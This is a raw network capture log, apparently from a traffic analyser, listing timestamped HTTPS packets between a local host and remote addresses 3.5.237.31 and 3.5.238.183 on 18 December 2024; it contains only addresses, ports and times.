                                                                                              Dec 18, 2024 13:05:46.865672112 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.865681887 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.865710020 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.865715981 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.865747929 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.865782022 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.865828037 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.865910053 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.871154070 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.871174097 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.871246099 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.871279955 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.871289015 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.871355057 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.912894011 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.912916899 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.912981033 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.913034916 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.913047075 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.913120031 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.919295073 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.919322014 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.919383049 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.919398069 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.919404030 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.919477940 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.978893995 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.978919029 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.979003906 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.979041100 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.979052067 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.980804920 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.985275984 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.985295057 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.985368013 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.985377073 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.985450983 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.990906000 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.990916967 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.990998030 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:46.991007090 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:46.991055965 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.011017084 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.011044025 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.011153936 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.011164904 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.011230946 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.057841063 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.057869911 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.057979107 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.057992935 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.058069944 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.064160109 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.064179897 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.064460993 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.064472914 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.064531088 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.105560064 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.105591059 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.105648041 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.105671883 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.105696917 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.106081963 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.111109972 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.111120939 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.111186981 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.111197948 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.111255884 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.172146082 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.172179937 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.172228098 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.172255039 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.172302008 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.172322989 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.178466082 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.178492069 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.178543091 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.178551912 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.178586006 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.178610086 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.184849024 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.184864998 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.184935093 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.184947014 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.185151100 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.202876091 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.202894926 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.202963114 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.202977896 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.203017950 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.203032017 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.249665976 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.249686003 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.249758005 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.249771118 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.249898911 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.255938053 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.255954027 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.256042957 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.256062031 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.256119013 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.299513102 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.299532890 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.299633980 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.299649954 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.299731970 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.303529024 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.303546906 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.303611040 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.303618908 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.303662062 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.366168976 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.366188049 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.366378069 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.366398096 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.366622925 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.371120930 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.371136904 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.371212006 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.371221066 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.371268034 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.379600048 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.379642963 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.379698038 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.379705906 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.379744053 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.379760981 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.395809889 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.395827055 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.395921946 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.395934105 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.396086931 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.443768978 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.443789005 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.443878889 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.443909883 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.443964005 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.450326920 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.450354099 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.450426102 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.450438023 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.450479031 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.450511932 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.489423037 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.489447117 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.489561081 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.489590883 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.489603996 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.490155935 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.495806932 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.495826006 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.495887041 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.495898008 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.496042967 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.556463957 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.556490898 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.556559086 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.556602001 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.556658983 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.562874079 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.562890053 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.562973022 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.563004017 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.563055992 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.569200993 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.569219112 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.569287062 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.569317102 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.569382906 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.587990046 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.588006020 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.588098049 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.588124037 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.588201046 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.633548021 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.633635044 CET443497103.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.633635998 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.633699894 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.651340008 CET49710443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.874655962 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.874694109 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:47.874902010 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.875272036 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:47.875291109 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:49.755439043 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:49.758445978 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:49.758469105 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.566349983 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.612446070 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.617212057 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.617219925 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.617261887 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.617352962 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.617360115 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.617372990 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.617404938 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.617441893 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.818027020 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.818049908 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.818167925 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.818197966 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.818248034 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.826471090 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.876971960 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.876987934 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.877127886 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.877147913 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.885227919 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.886738062 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.886765003 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.940556049 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.956031084 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.956046104 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:50.956187010 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:50.956217051 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.003029108 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.005692959 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.005737066 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.005783081 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.005788088 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.005805016 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.005822897 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.005847931 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.005856037 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.005909920 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.005917072 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.049961090 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.067934036 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.067945004 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.067985058 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.068017006 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.068028927 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.068061113 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.068064928 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.068104029 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.071041107 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.094208002 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.094235897 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.094299078 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.094312906 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.094352961 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.143646002 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.172683954 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.172697067 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.172725916 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.172744989 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.172772884 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.172787905 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.172818899 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.172828913 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.175745010 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.195657969 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.195674896 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.195719957 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.195732117 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.195760012 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.216114998 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.216192961 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.216206074 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.216264009 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.217523098 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.217573881 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.287606001 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.287638903 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.287708044 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.287719965 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.287751913 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.287769079 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.289663076 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.302850008 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.302882910 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.302925110 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.302936077 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.302952051 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.319056034 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.319096088 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.319155931 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.319168091 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.319205999 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.333249092 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.333291054 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.333338022 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.333348989 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.333374977 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.356875896 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.356993914 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.357009888 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.357139111 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.358583927 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.358664036 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.372128010 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.372144938 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.372208118 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.372272015 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.372281075 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.372313023 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.385006905 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.385026932 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.385123014 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.385134935 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.424896002 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.432465076 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.432502031 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.432586908 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.432601929 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.432637930 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.432652950 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.432853937 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.443393946 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.443413019 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.443473101 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.443483114 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.443507910 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.486670017 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.486733913 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.486767054 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.486779928 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.486814022 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.495649099 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.495687962 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.495770931 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.495784998 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.495836973 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.504244089 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.504262924 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.504296064 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.504336119 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.504345894 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.504369020 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.543051958 CET443497143.5.237.31192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.543190956 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.543649912 CET49714443192.168.2.53.5.237.31
                                                                                              Dec 18, 2024 13:05:51.795233011 CET49715443192.168.2.53.5.238.183
